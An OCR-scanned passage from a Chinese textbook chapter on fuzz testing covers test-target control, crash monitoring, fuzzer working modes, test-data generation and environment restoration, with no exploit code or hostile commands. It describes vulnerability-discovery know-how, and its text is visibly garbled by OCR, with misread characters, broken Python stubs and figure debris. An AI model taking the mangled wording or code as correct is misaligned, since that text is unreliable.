环境 控制 模块 负责 测试 对 象 的 控制 和 运行 环境 的 维护 。 测 试 对 象 控制 的 目标 包含 测 
试 目标 软件 的 启动 .暂停 .终止 以 及 数据 交互 过 程 ,此 外 还 有 测试 服务 目标 网 络 连接 的 创 
建 ,传输 、 断 开 等 ,如 Word 程序 的 打开 与 关闭 ,TCP 连接 的 创建 . 断 开 和 数据 包 的 发 送 
等 。 和 运行 环境 维护 是 构建 测试 对 象 的 运行 所 需 的 所 有 环境 因素 ,包含 网 络 环境 与 主机 环 
境 , 并 恢复 消除 测试 过 程 中 产生 的 破坏 影响 ,如 Word 打开 文件 失败 会 被 记录 到 注册 表 
中 ,下 次 启动 会 提示 进入 安全 模式 。 

测试 对 象 的 控制 同样 面临 测试 对 象 多 样 化 问题 ,不同 测 试 对 象 需要 不 同 的 控制 方式 ， 
测试 对 象 根据 输入 数据 交互 方式 的 不 同 通常 分 为 网 络 服务 类 和 文件 处 理 程序 两 大 类 。 针 
对 网 络 服务 测试 对 象 ,环境 控制 模块 需要 支持 多 种 网 络 层 与 连接 层 协议 ,支持 采用 不 同 网 
络 协议 的 不 同类 型 的 测试 对 象 ,并 将 数据 生成 模块 生成 的 应 用 层 数据 包 按照 测试 对 象 要 
求 的 协议 封装 成 网 络 层 数 据 包 , 通 过 网 络 方式 发 送 给 测试 对 象 。 针 对 文件 处 理 程序 ,环境 
控制 模块 能 够 将 文件 作为 测试 对 象 的 输入 ,通过 调用 cmd 或 shell 启动 测试 对 象 打开 文 
件 ,并 且 接 受 文件 路 径 作 为 命令 行 参数 。 在 某 些 特定 情况 下 或 考虑 到 特殊 需求 ,环境 控制 
模块 能 够 通过 创建 进程 的 方式 启动 测试 对 象 , 然 后 再 通过 com 接口 或 其 他 进程 间 通 信和 的 
方式 让 测试 对 象 打开 文件 。 

环境 控制 模块 还 需要 构建 测试 对 象 运行 所 需 的 所 有 环境 因素 ,包含 网 络 环境 与 主机 
环境 。 有 些 软件 在 打开 文件 时 还 伴随 着 一 些 网 络 访问 ,这 些 网 络 访问 的 状况 可 能 会 影响 
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程序 执行 的 结果 ,因此 环境 控制 模块 应 根据 需要 开放 外 网 连接 ,或 者 模拟 特定 网 络 服务 使 
得 测试 对 象 按 特定 工作 模式 运行 。 有 些 软件 在 打开 文件 时 可 能 会 在 文件 系统 或 注册 表 中 
产生 一 些 残余 信息 ,这 些 信息 可 能 会 影响 下 一 次 文件 打开 过 程 ,此 时 环境 控制 模块 还 需要 
对 这 些 残余 数据 进行 清理 。 

3. 状态 监控 模块 

状态 监控 模块 的 功能 是 监控 测试 对 象 的 运行 状态 ,捕获 程序 执行 过 程 中 出 现 的 异常 ， 
记录 触发 该 异常 的 测试 用 例 。 状 态 监 控 模 块 监 控 的 目标 程序 运行 状态 包括 被 捕获 的 异常 
与 未 被 捕获 的 异常 。 被 捕获 的 异常 主要 指 畸 形 数据 被 正确 解析 并 由 目标 程序 的 异常 处 理 
过 程 捕获 的 异常 和 畸形 数据 被 目标 程序 错误 解析 而 由 操作 系统 异常 处 理 例 程 捕获 的 异 
常 ; 未 被 捕获 的 异常 指 畸 形 数据 对 应 的 程序 执行 路 径 巧 合 地 绕 过 了 目标 程序 与 操作 系统 
的 异常 处 理 过 程 或 者 实现 了 一 次 成 功 的 利用 。 状 态 监控 模块 还 需要 记录 蜡 常 的 现场 状 
态 , 以 区 分 不 同 测试 用 例 导 致 的 不 同 的 异常 ,并 可 以 用 于 复 现 测试 异常 ,为 分 析 其 是 否 潜 
在 漏洞 提供 数据 支撑 。 

状态 监控 模块 在 捕获 异常 时 需要 对 测试 对 象 异 常 的 3 种 情况 分 别 进行 处 理 。 第 一 种 
是 被 测试 对 象 内 置 的 异常 处 理 流程 捕获 ,导致 程序 结束 或 者 该 测试 用 例 对 应 的 处 理 过 程 
结束 ;第 二 种 是 程序 内 置 的 异常 处 理 过 程 没有 进行 处 理 , 导 致 执行 过 程 进入 操作 系统 默认 
的 异常 处 理 过 程 ,此 时 程序 将 被 中 断 执行 ;第 三 种 是 测试 对 象 以 超出 设计 预期 的 方式 进行 
了 异常 处 理 , 并 导致 了 未 预期 的 结果 。 一 般 来 说 ,在 软件 漏洞 发 掘 过 程 中 后 两 种 情况 最 有 
价值 , 它 有 可 能 揭示 了 一 个 漏洞 。 状 态 监 控 模 块 主要 对 后 两 种 情况 进行 监控 。 对 于 第 二 
种 情况 ,可 以 将 状态 监控 模块 作为 独立 的 可 执行 程序 ,并 将 Windows 的 默认 调试 器 设 为 
该 可 执行 程序 的 路 径 , 就 可 以 在 测试 对 象 出 现 异 常 的 第 一 时 间 发 现 。 对 于 第 三 种 情况 , 状 
态 监控 模块 需要 根据 测试 对 象 的 实际 情况 设置 异常 监控 的 触发 条 件 , 如 监控 测试 对 象 的 
进程 的 网 络 操作 文件 读 写 操作 以 及 生命 周期 等 状况 ,判断 其 是 否 出 现 某 种 异常 行为 。 

对 于 同时 只 能 处 理 一 个 测试 用 例 的 测试 对 象 , 状 态 监控 模块 可 以 简单 地 精确 确定 异 
常 对 应 的 测试 用 例 。 但 是 对 于 测试 对 象 同时 使 用 多 个 线程 处 理 多 个 测试 用 例 的 情况 , 例 
如 能 同时 处 理 大 量 HTTP 请 求 的 Web 服务 器 ,使 用 这 种 简单 的 状态 监控 方法 就 不 能 满 
足 要 求 。 针 对 多 线程 处 理 带 来 的 困难 ,可 以 通过 估计 测试 用 例 可 能 存在 的 范围 ,选取 可 能 
触发 异常 的 多 个 测试 用 例 进 行 弥 补 。 然 而 ,更 加 积极 的 方法 是 深入 测试 对 象 的 执行 过 程 ， 
获取 更 细 粒 度 的 执行 状态 ,从 而 进行 更 准确 的 判断 。 这 种 细 粒 度 监控 方法 除了 可 以 帮助 
定位 引发 异常 的 测试 用 例外 ,还 能 提取 线索 以 指导 测试 用 例 生 成 过 程 。 
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针对 不 同 的 测试 对 象 和 环境 ,模糊 测试 主要 有 3 种 工作 模式 : 网 络 模式 .本 地 模式 与 
虚拟 机 模式 。 网 络 模式 是 指 模糊 测试 系统 仅 通过 网 络 通信 的 方式 与 测试 对 象 进行 交互 ， 
本 地 模式 是 指 模糊 测试 系统 在 测试 对 象 运行 的 操作 系统 上 运行 环境 控制 模块 进程 或 代理 
进程 ,虚拟 机 模式 是 指 模糊 测试 系统 主要 通过 虚拟 机 的 控制 接口 对 测试 对 象 进行 控制 。 

模糊 测试 系统 的 网 络 模式 适用 于 测试 对 象 是 网 络 应 用 程序 或 者 主要 通过 网 络 的 方式 
提供 服务 的 情况 。 该 模式 下 ,测试 对 象 可 能 是 部 署 在 互联 网 上 的 应 用 ,模糊 测试 系统 只 能 
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通过 网 络 发 送 数据 并 接收 返回 的 数据 与 状态 码 : 也 可 能 是 部 署 在 模糊 测试 系统 内 部 网 络 
环境 中 的 应 用 程序 ,此 时 模糊 测试 系统 还 能 监控 其 程序 状态 。 其 系统 结构 如 图 6-2 所 示 ， 
环境 控制 模块 与 状态 监控 模块 通过 网 络 连接 的 方式 进行 ,环境 控制 模块 将 数据 生成 模块 
生成 的 测试 用 例 发 送 给 测试 对 象 ,状态 监控 模块 通过 监测 连接 状态 监控 目标 的 运行 状态 。 
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图 6-2 网 络 模式 架构 


模糊 测试 系统 的 本 地 模式 是 指 测试 对 象 部 署 在 模糊 测试 系统 内 部 ,模糊 测试 系统 在 
其 运行 的 操作 系统 上 部 署 了 环境 控制 模块 或 者 代理 ,能 够 控制 测试 对 象 的 运行 过 程 的 工 
作 模 式 。 在 此 模式 下 ,模糊 测试 系统 可 以 对 测试 对 象 的 功能 进行 全 面 测试 ,其 测试 数据 可 
以 是 网 络 数据 包 , 也 可 以 是 文件 甚至 环境 状态 。 本 地 模式 下 的 模糊 测试 系统 架构 如 
图 6-3 所 示 ,环境 控制 模块 将 数据 生成 模块 生成 的 测试 用 例 强 制 输入 给 目标 进程 ,其 中 涉 
及 进程 管理 ,文件 管理 流量 采集 和 软件 调试 等 关键 技术 ,状态 监控 模块 通过 捕获 本 地 进 
程 的 异常 来 发 现 异 常 测试 用 例 。 
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数据 生成 模块 环境 控制 模块 
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。 合成 复 台 文件 。 缓 存 发 送 数据 包 Return address-- 





























图 6-3 本 地 模式 架构 
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模糊 测试 系统 的 虚拟 机 模式 是 指 测试 对 象 运行 在 虚拟 机 软件 中 ,模糊 测试 系统 主要 
通过 虚拟 机 软件 提供 的 接口 对 测试 对 象 进行 操作 。 在 此 模式 下 ,模糊 测试 系统 可 以 实现 
本 地 模式 下 所 有 的 功能 。 虚 拟 机 模式 的 系统 架构 如 图 6-4 所 示 ,测试 用 例 生成 通常 在 虚 
拟 机 外 部 进行 ,环境 控制 模块 和 状态 监控 模块 可 以 在 虚拟 机 的 hypervisor 层 或 主机 操作 
系统 上 运行 。 在 虚拟 机 的 hypervisor 层 进 行 控制 和 监控 需要 通过 虚拟 化 平台 的 操作 接口 
输入 测试 数据 ,管理 测试 对 象 的 运行 ,监控 测试 对 象 运行 状态 ,提取 最 终 的 生成 数据 。 在 
主机 操作 系统 层 进行 的 监控 可 以 通过 虚拟 化 平台 的 操作 接口 或 者 网 络 协议 进行 数据 的 传 
输 , 控 制 和 监控 则 完全 位 于 主机 内 部 。 
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VMWare 提 供 了 许 地 接口 如 
Searchindex 类 提供 了 FindAlIByIp 等 区 
取 工 拟 机 管理 控制 结构 的 方法 ， 在 此 基 
础 上 可 对 应 拟 机 的 运行 状态 进行 监控 














图 6-4 虚拟 机 模式 架构 


6.3 基础 方法 与 技术 


模糊 测试 需要 综合 运用 各 项 方法 和 技术 ,通过 将 各 项 技术 融合 起 来 ,以 解决 各 个 模块 
所 涉及 的 问题 。 目 前 业界 的 模糊 测试 工具 种 类 繁多 ,有 的 工具 是 为 了 提供 一 个 良好 的 可 
扩展 的 框架 ,而 有 的 是 为 了 满足 某 些 特 定 的 需求 。 但 是 这 些 工 具 在 总 体 功 能 结构 上 相似 ， 
一 般 都 包含 生成 数据 的 功能 、 控 制 测试 对 象 的 功能 与 监控 测试 对 象 的 功能 。 因 此 ,本 节 以 
这 3 部 分 的 功能 为 基础 ,介绍 各 部 分 涉及 的 方法 与 技术 。 


631 数据 生成 方法 


测试 数据 生成 的 方法 包含 基本 类 型 数据 生成 和 复合 类 型 数据 生成 ,基本 数据 类 型 包 
含 整 型 .长 整 型 ,无 符号 整 型 , 字 、 双 字 与 字符 串 , 字 符 串 还 需要 根据 编码 的 不 同 分 为 
ASCII 字符 串 、Unicode 字符 串 等 ,复合 数据 类 型 是 将 基本 数据 类 型 进行 组 合 。 简 单 的 数 
据 生 成 方法 有 预定 义 序列 、 指 数 、 宕 、 随 机 等 。 

1. 基本 类 型 数据 生成 方法 

基本 类 型 数据 是 最 简单 的 基础 的 数据 类 型 ,也 是 复杂 数据 类 型 .交互 型 数据 类 型 的 基 
础 元 素 ,这 种 类 型 数据 描述 的 是 程序 输入 中 扁平 结构 的 部 分 。 

预定 义 序列 包含 大 量 用 户 预先 定义 的 取 值 ,这 些 取 值 来 源 于 用 户 经 验 以 及 各 种 方式 
收集 的 数据 。 这 些 取 值 主要 有 两 种 情况 ,一 种 是 具有 特定 意义 的 固定 数值 或 字符 串 ,如 文 
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件 中 的 魔 数 , 另 一 种 是 一 些 畸 形 数据 ,如 0x0、0xffffffff 或 者 一 个 超 长 的 字符 串 。 一 个 好 
的 预定 义 序列 能 十 分 迅速 地 发 现 软件 的 漏洞 。 预 定义 序列 在 生成 字符 串 类 型 的 数据 时 有 
特别 的 优势 ,这 是 由 于 程序 会 针对 性 地 处 理 那些 和 自然 语言 存在 对 应 关系 的 字符 串 ,而 这 
些 字符 串 往 往 依赖 用 户 经 验 或 语料库 。Peach 3 定义 了 超过 4000 个 字符 串 ,其 中 一 部 分 
还 以 正则 表达 式 的 方式 出 现 。 

对 于 整 型 长 整 型 .无 符号 整 型 , 字 与 双 字 等 基础 类 型 ,一 般 用 来 表示 一 个 外 界 输入 或 
包含 外 界 输入 的 一 个 运算 结果 ,其 数值 在 没有 经 验 知识 的 前 提 下 是 不 可 预知 的 ,此 时 可 以 
采用 随机 数 序列 来 覆盖 这 些 基础 类 型 的 状态 空间 。 随 机 的 测试 数据 生成 方法 适用 于 测试 
数据 取 值 为 平均 分 布 的 情况 。 考 虑 到 计算 代价 ,随机 数 序列 一 般 通 过 伪 随 机 数 生成 算法 
实现 ,一 个 推荐 的 伪 随 机 数 生成 算法 是 Mersenne Twister 算法 。 

考虑 到 人 类 对 信息 的 处 理 能 力 限制 ,一 个 大 数字 通常 会 通过 近似 与 量 岗 变化 变 为 一 
个 容易 记忆 和 计算 的 小 数字 ,如 324809kg, 在 输入 程序 时 可 能 被 记 为 325t。 因 此 ,程序 的 
输入 、 输 出 变量 在 较 小 值 的 分 布 概率 要 远大 于 在 较 大 值 的 分 布 ,这 一 特点 也 会 影响 程序 中 
过 程 变量 的 分 布 。 考 虑 一 个 满足 在 [0,65 535] 上 均匀 分 布 的 随机 数 序列 ,其 落 在 [0,16] 
区 间 的 概率 为 2 ”。 尽 管 并 没有 证 据 证 明 按 照 这 一 特点 生成 测试 数据 能 更 有 效 地 发 现 程 
序 漏 洞 , 但 是 并 不 妨碍 寡 增 长 的 数据 生成 方式 作为 一 种 快速 覆盖 小 数值 与 大 数值 的 方法 
被 广泛 应 用 。 

整 型 .长 整 型 .无 符号 整 型 . 字 与 双 字 等 基础 类 型 也 往往 被 用 来 作为 枚 举 类 型 .分支 语 
句 的 case, 状 态 码 使 用 ,此 时 这 些 变 量 的 取 值 一 般 为 一 系列 连续 的 整数 。 因 此 将 指数 增长 
方式 与 连续 整数 方式 结合 起 来 能 更 好 地 生成 有 效 的 测试 数据 。 

下 面 设 计 了 一 个 基础 数据 的 基 类 : 

class simple type(): 

def init (self): 
self.data- [] 
self.index-0 
def preset generator (self, data): 
self.data- data 
def random generator (self, seed) : 
def Lu num (self, seed): 


pass 


其 中 data 属性 用 于 保存 该 字段 在 模糊 测试 过 程 中 准备 使 用 的 样 例 序 列 ,index 属性 
表示 当前 测试 用 例 采 用 样 例 的 序号 , preset_ generator, random _ generator, power _ 
generator 描述 了 多 种 生成 样 例 序列 的 方法 ,其 中 preset generator 在 基 类 中 进行 了 定义 ， 
其 他 方法 需要 在 不 同类 型 的 扩展 基本 类 型 类 中 进行 定制 。 除 上 述 几 种 数据 生成 方法 外 ， 
基本 类 型 还 可 以 根据 用 户 经 验 结合 采 用 定制 的 生成 方法 。 

基本 类 型 数据 生成 是 复合 类 型 数据 与 多 阶段 交互 类 型 数据 生成 的 基础 。 图 6-5 通过 
种 子 数据 包 的 变异 生成 基本 类 型 数据 。 
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图 6-5 基础 类 型 数据 生成 过 程 


2. 复合 类 型 数据 生成 方法 

文件 、 网 络 数据 包 分 别 按照 文件 格式 、 网 络 协 议 格式 将 基本 类 型 数据 组 合成 复合 类 型 
数据 。 基 础 类 型 数据 组 合成 复合 类 型 数据 的 方式 有 顺序 、 乱 序 、 可 选 、 选 择 、 相 关 等 ,同时 
复合 类 型 数据 也 可 以 通过 同样 的 方式 构成 更 复杂 的 复合 类 型 数据 。 

顺序 是 指 两 个 以 上 的 数据 按照 次 序 排列 成 一 个 复合 类 型 数据 。 乱 序 是 指 两 个 以 上 的 
数据 按 任 何 排列 方式 组 合成 一 个 复合 类 型 数据 。 可 选 是 复合 类 型 数据 中 的 某 一 个 数据 可 
以 存在 也 可 以 为 空 。 选 择 是 指 在 两 个 以 上 的 数据 中 选择 一 个 作为 复合 类 型 数据 的 组 成 部 
分 。 相 关 是 指 一 个 数据 的 取 值 与 其 他 数据 相关 。 

为 了 方便 描述 ,可 以 将 数值 型 数据 记 为 num, 字 符 型 数据 记 为 char, 简 单 类 型 数据 记 
为 s, 复 合 类 型 数据 记 为 ,序列 记 为 list。 将 作用 在 list 上 的 顺序 、 乱 序 、 选 择 与 相关 记 为 
seq.alter 与 choice, 将 作用 在 c 上 的 可 选 记 为 opt, 可 以 得 到 复合 类 型 数据 的 形式 化 表示 。 
感 兴趣 的 读者 可 以 根据 需求 对 其 进行 扩充 。 下 面 用 递归 的 方式 描述 复合 类 型 数据 : 


length:=num 

str:= list (char) 

value:=num| func (list (s) ) 

svalue:-str| func (list (s) ) 

s:= (length, value) | (length, svalue) 

c:-s|seq(list (c)) |alter (list (c) ) |opt (c) | choice (list (cond (list (s)),c)) 


敏锐 的 读者 可 能 已 经 开始 基于 这 些 表达 式 编 写 复合 类 型 的 生成 方法 了 。 下 面 用 
Python 代码 表示 复合 类 型 数据 : 
class complex type(): 
def init (self, list): 
self.list-list 
self.data- [] 
def generator (self): 
pass 
def publish (self): 
pass 
其 中 self. list 属性 保存 该 复合 类 型 包含 子 类 型 ,self. data 属性 保存 该 复合 类 型 对 象 
当前 各 子 类 型 的 值 。generator 方 法 需要 在 每 个 具体 的 复合 类 型 模式 对 应 的 子 类 中 进行 
定义 , 它 应 该 依次 返回 子 类 型 的 组 合 方式 ,generator 可 以 采用 遍历 其 子 类 型 树 , 并 按 次 序 
将 简单 类 型 数据 的 index 属性 增加 1 的 方式 生成 测试 用 例 序 列 。publish 方法 则 将 self 
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. data 属性 中 保存 的 复合 类 型 数值 转换 为 数据 包 或 文件 ,其 可 以 采用 递归 调用 方式 实现 。 
图 6-6 描绘 了 将 网 络 数据 包 作为 一 个 复合 字段 生成 测试 用 例 的 过 程 。 


cond 








iium — 
准备 阶段 B:DWORD G:BINARY(12) c] 






ON 


图 6-6 复合 字段 生成 过 程 


3. 多 阶段 交互 类 型 数据 生成 方法 

当 测 试 对 象 向 外 界 提供 服务 的 过 程 包含 多 次 数据 交互 时 ,客户 端 与 服务 端的 数据 包 
必须 根据 对 方 的 请 求 与 响应 进行 构造 ,双方 按照 协议 约定 的 过 程 按 次 序 发 送 数据 。 协 议 
规范 了 这 些 数据 之 间 存 在 的 约束 关系 ,数据 生成 模块 生成 的 测试 数据 需要 能 够 反映 测试 
对 象 的 这 种 数据 交互 特点 。 

在 对 多 阶段 类 型 数据 的 结构 进行 定义 前 ,需要 构建 一 个 简单 的 模型 对 数据 交互 过 程 
进行 描述 。 以 客户 /服务 器 模式 为 例 ,客户 端的 状态 集合 为 C — {Ci C» C) ,服务 器 
MORERA HSS {S ,S* S.) ,客户 端的 请 求 数据 集合 为 Q= (qom qi) ,服务 
器 端的 返回 数据 集合 为 RS rere etn) ,可 以 将 客户 端 与 服务 器 端的 交 ro 6-7 
表示 。 

从 图 6-7 所 示 的 过 程 中 可 以 看 到 ,在 一 次 典型 的 客户 端 与 服务 器 端 交 互 过 程 中 ,客户 
端 发 送 的 数据 包 只 与 客户 端 自身 状态 与 服务 器 端 返回 的 数据 相关 。 然 而 上 述 过 程 只 表示 
了 客户 端 与 服务 器 端 交互 的 一 个 特定 过 程 ,为 了 数据 生成 模块 能 够 生成 全 面 的 测试 数据 ， 
下 面 尝试 使 用 图 6-8 的 方式 对 客户 端 与 服务 器 端 交 互 过 程 进 行 表示 。 

Qu 表示 客户 端 在 交互 构成 第 一 个 阶段 所 有 可 能 的 数据 包 的 集合 ,Ri,: 表 示 服 务 器 端 
第 二 阶段 返回 的 一 部 分 数据 的 集合 。 由 于 服务 器 端 返回 的 数据 可 能 会 导致 下 一 阶段 客户 
端 发 送 的 数据 相互 之 间 有 较 大 的 区 别 , 因 此 为 了 更 加 方便 地 生成 测试 数据 ,需要 按照 语法 
格式 的 差异 将 这 些 数据 分 为 不 同 的 集合 。 

根据 图 6-8 可 以 构造 一 棵 树 来 描述 测试 用 例 , 树 的 节点 是 客户 端 数 据 的 语法 结构 , 边 
是 服务 器 端 数据 满足 的 约束 条 件 。 根 据 这 个 数据 结构 ,数据 生成 模块 可 以 根据 节点 描述 
的 数据 语法 结构 生成 测试 数据 ,然后 根据 服务 器 端 返回 的 数据 决定 下 一 个 数据 包 对 应 的 
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图 6-8 客户 端 与 服务 器 端 交互 的 过 程 
节点 ,最 终 在 与 服务 器 端的 动态 交互 过 程 中 生成 完整 的 测试 用 例 。 


632 环境 控制 技术 


环境 控制 模块 的 功能 是 控制 测试 对 象 的 运行 ,将 生成 的 测试 用 例 强制 输入 给 测试 对 
象 ,维护 测试 对 象 运 行 所 需 的 环境 ,其 中 用 到 的 方法 与 技术 在 本 书 中 统称 为 环境 控制 技 
术 , 按 照 功 能 划分 可 分 为 3 类 : 运行 环境 维护 技术 、 程 序 运行 控制 技术 、 数 据 强制 输入 
技术 。 

1. 运行 环境 维护 技术 

当 环 境 控 制 模块 与 测试 对 象 运行 在 同一 个 操作 系统 中 ,或 者 在 测试 对 象 运行 的 操作 
系统 中 运行 了 环境 控制 模块 的 代理 终端 时 ,环境 控制 模块 可 以 对 测试 对 象 运行 的 环境 进 
行 控 制 与 维护 。 测 试 对 象 对 测试 数据 的 处 理 可 能 还 与 其 他 环境 因素 有 关 , 测 试 过 程 中 产 
生 的 注册 表 键 值 、 配 置 文件 ,日 志文 件 与 临时 文件 等 都 可 能 影响 后 续 测 试 对 象 的 运行 。 为 
了 消除 前 期 测试 对 后 续 测 试 造成 的 不 良 干 扰 ,运行 环境 维护 采用 了 快照 备份 .注册 表 恢 
复 .文件 恢复 等 技术 支撑 运行 环境 的 恢复 维护 。 

快照 备份 是 虚拟 机 的 常用 技术 ,如 使 用 QEMU 的 savevm 和 loadvm, 能 够 保存 虚拟 
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机 系统 的 文件 系统 状态 (包括 磁盘 文件 和 注册 表 ) 、 内 存 运行 状态 .CPU 状态 ,除了 外 部 网 
络 环境 状态 之 外 的 其 他 所 有 与 测试 对 象 相关 的 内 部 环境 状态 都 能 够 被 记录 保存 。 采 用 这 
项 技术 需要 在 测试 每 个 用 例 时 重新 加 载 虚拟 机 快照 ,还 原 出 保存 的 快照 系统 ,然后 从 外 部 
获取 测试 样本 文件 ,获取 渠道 可 以 是 光盘 镜像 或 者 网 络 , 最 后 启动 测试 例 程 。 每 次 还 原 保 
存 的 快照 虽然 需要 一 定 的 额外 开销 ,但 还 原 的 快照 系统 是 最 纯粹 的 不 受 干扰 的 环境 系统 。 

注册 表 恢 复 技术 是 指 在 运行 完 一 个 测试 用 例 之 后 ,还 原 出 运行 该 测试 用 例 前 的 注册 
表 信 息 。 通 过 监测 Word、PowerPoint 等 软件 的 运行 过 程 发 现 其 有 大 量 的 注册 表 操 作 , 这 
些 操作 包括 查询 注册 表 和 修改 注册 表 , 大 部 分 的 操作 并 不 会 对 下 一 测试 用 例 的 运行 产生 
影响 。 但 是 , 当 Word 打开 一 个 格式 异常 的 文件 时 ,会 在 注册 表 中 记录 相关 日 志 , 下 一 次 
再 打开 时 查询 到 该 异常 ,导致 执行 了 其 他 的 代码 ,弹出 窗口 提示 用 户 以 安全 模式 打开 ,或 
者 提示 用 户 恢 复 文件 等 。 考 虑 到 注册 表 对 测试 对 象 运行 的 影响 特点 ,环境 控制 模块 除了 
可 以 备份 整个 注册 表 并 在 下 次 运行 时 全 部 恢复 外 ,还 可 以 定位 对 后 续 运 行 有 影响 的 注册 
表 键 ,只 需 在 下 次 测试 用 例 运行 之 前 恢复 或 删除 这 些 注册 表 键 即 可 ,这 种 方式 的 系统 负载 
较 小 ,性 能 较 高 ,但 需要 前 期 对 目标 软件 进行 有 针对 性 的 分 析 。 

文件 恢复 技术 是 指 在 运行 完 一 个 测试 用 例 之 后 ,还 原 出 运行 该 测试 用 例 前 的 文件 系 
统 。 通 过 监测 Word, OpenOffice 等 软件 的 运行 过 程 发 现 其 有 大 量 的 临时 文件 生成 和 配 
置 文件 操作 ,这些 操作 包括 创建 .打开 、 读 写 . 关 闭 、 删 除 文件 ,大 部 分 的 操作 并 不 会 对 下 一 
测试 用 例 的 运行 产生 影响 。 但 是 , 当 OpenOffice 打开 一 个 格式 异常 的 文件 并 发 生 崩 省 
时 ,会 在 registrymodifications. xcu 文件 中 记录 相关 信息 ,下 一 次 再 打开 时 查询 到 该 异常 ， 
导致 执行 了 其 他 分 支 的 代码 ,弹出 窗口 提示 用 户 上 次 的 错误 信息 。 环 境 控 制 模 块 通过 备 
份 registrymodifications. xcu 文件 ,并 在 每 个 测试 用 例 测试 完成 之 后 恢复 该 文件 可 以 消除 
这 种 影响 。 另 外 ,将 文件 属性 设置 成 只 读 也 是 一 种 方式 ,但 这 种 方式 必然 也 会 影响 到 其 他 
执行 分 支 ,如 写 日 志文 件 失败 进入 其 他 异常 。 除 了 使 用 快照 备份 的 方式 ,要 恢复 测试 过 程 
中 所 有 被 修改 的 文件 具有 一 定 的 挑战 性 ,测试 对 象 的 差异 导致 了 算法 逻辑 上 的 复杂 ,必然 
影响 到 测试 的 性 能 ,同样 只 需 定位 对 后 续 运 行 有 影响 的 文件 ,在 下 次 测试 用 例 运行 之 前 恢 
复 或 删除 这 些 文件 即 可 。 这 种 方式 的 系统 负载 较 小 ,性 能 较 高 ,但 需要 前 期 分 析 找 出 具有 
影响 能 力 的 文件 。 

2. 程序 运行 控制 技术 

程序 运行 的 控制 是 指 测 试 程序 运行 在 本 地 系统 下 ( 非 互 联网 上 的 网 络 服务 ,可 以 是 自 
己 搭建 的 网 络 服务 ) 对 程序 的 启动 .暂停 .调试 .修改 ,终止 等 控制 ,实现 这 些 控制 功能 的 技 
术 统 称 为 程序 运行 控制 技术 。 这 些 控制 技术 在 不 同 的 控制 模式 下 采用 不 同 的 方法 与 技术 
实现 。 下 面 分 别 介绍 本 地 模式 和 虚拟 机 模式 下 的 程序 运行 控制 技术 。 

当 环 境 控 制 模块 采用 本 地 管理 模式 对 测试 对 象 进行 控制 时 ,环境 控制 模块 可 以 通过 
Windows 系统 内 置 的 CreateProcess 系列 的 API 系统 调用 创建 测试 对 象 进程 ,也 可 能 通 
过 cmd, shell 等 应 用 启动 测试 对 象 进程 ,并 获得 进程 句柄 。 通 过 进程 句柄 ,环境 控制 模块 
可 以 实现 测试 对 象 进程 的 调试 控制 ,能 够 暂停 程序 的 运行 ,并 修改 进程 内 存 , 提 供 内 存 
Fuzz 的 基本 技术 支撑 。 通 过 进程 句柄 ,环境 控制 模块 可 以 使 用 系统 提供 的 接口 终止 程序 
的 运行 ,终止 条 件 是 当前 测试 用 例 测 试 结 束 , 可 以 是 超时 结束 或 发 现 异 常 后 结束 等 其 他 因 
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素 。 此 外 ,通过 环境 控制 模块 提取 的 数据 ,还 能 够 为 状态 监控 模块 准备 资源 ,包括 网 卡 绑 
定 对 象 . 调 试 线程 .文件 句柄 等 。 图 6-9 给 出 了 一 些 典型 的 进程 管理 的 API 接口 。 
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图 6-9 进程 管理 API 


当 模 糊 测 试 系统 采用 虚拟 化 技术 运行 测试 对 象 时 ,测试 对 象 的 控制 工作 可 以 在 Host 
OS 中 进行 ,并 通过 虚拟 化 软件 提供 的 接口 对 Guest OS 中 运行 的 测试 对 象 的 运行 环境 进 
行 管理 。 测 试 对 象 的 启动 使 用 自 启 动 技术 ,将 其 设置 成 开机 自 启动 ,测试 对 象 的 启动 与 结 
束 即 可 用 虚拟 机 镜像 的 启动 与 结束 来 实现 。 另 外 ,在 虚拟 机 软件 支持 快照 的 条 件 下 ,可 以 
利用 快照 加 快 镜像 启动 过 程 。 这 种 方法 中 ,测试 对 象 在 虚拟 机 每 次 启动 过 程 中 只 执行 一 
次 ,并 且 每 次 执行 的 初始 状态 完全 一 致 ,使 得 后 续 的 分 析 过 程 能 避免 复杂 环境 因素 的 干 
扰 。 如 果 模 糊 测 试 系统 采用 的 虚拟 化 软件 是 VMWare, 可 以 在 虚拟 机 镜像 中 预 装 代理 软 
fF ,并 采用 自 启动 技术 启动 代理 ,然后 通过 网 络 控制 代理 对 Guest OS 中 的 环境 进行 管 
理 ,也 可 以 使 用 VMWare 提供 的 接口 启动 代理 进程 。 当 虚拟 化 软件 是 QEMU 等 开源 软 
件 时 ,除了 使 用 代理 之 外 ,还 可 以 通过 定制 Hypervisor JAX} Guest OS 上 的 测试 对 象 运行 
环境 进行 控制 。 

3. 数据 强制 输入 技术 

测试 对 象 的 差异 导致 接收 输入 的 方式 具有 多 样 性 ,主要 有 网 络 .文件 .计算 机 外 设 等 
形式 。 网 络 形式 主要 针对 网 络 服务 程序 ,如 FTP 服务 器 .HTTP 服务 器 等 ,环境 控制 模 
块 将 生成 的 畸形 协议 数据 包 强行 发 送 给 服务 程序 进行 测试 ;文件 形式 主要 针对 文件 解析 
软件 ,如 Word, Adobe Reader、 音 视频 播放 器 、 图 片 查 看 器 等 ,环境 控制 模块 将 强制 运行 
目标 软件 以 打开 畸形 数据 文件 ;外 设 输入 包括 鼠标 和 键盘 ,常用 于 UI 测试 ,通过 模拟 鼠 
标 .键盘 操作 强制 点 击 界面 或 输入 字符 ,这 一 类 在 漏洞 挖掘 领域 较为 少见 。 测 试 数据 输入 
的 方式 根据 测试 对 象 以 及 测试 环境 的 不 同 ,分 为 网 络 文件 .用 户 操作 等 多 种 方式 ,根据 这 
些 差异 可 将 数据 强制 输入 技术 分 类 为 网 络 数据 输入 技术 文件 数据 输入 技术 和 用 户 操作 
输入 技术 ,另外 还 有 内 存 Fuzz 中 用 到 的 内 存 数据 修改 技术 。 

1) 网 络 数据 输入 技术 

当 目 标 软件 对 外 界 提供 网 络 服务 时 ,测试 数据 通过 网 络 形式 强制 发 送 给 被 测 目标 ,被 
测 目标 受 迫 接收 畸形 数据 ,并 对 数据 进行 处 理 。 环 境 控制 模块 根据 测试 对 象 提 供 服务 的 
网 络 地 址 .端口 ,协议 类 型 ,强制 与 测试 目标 创建 网 络 连接 ,并 发 送 测试 数据 到 目标 ,这 需 
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要 对 目标 协议 有 初步 了 解 ,如 TCP 需要 采用 TCP 的 协议 进行 连接 ,UDP 需要 使 用 UDP 
的 形式 进行 连接 的 创建 。 如 果 不 是 为 了 测试 目标 处 理 异 常 连 接 的 能 力 ,在 单 次 测试 完毕 
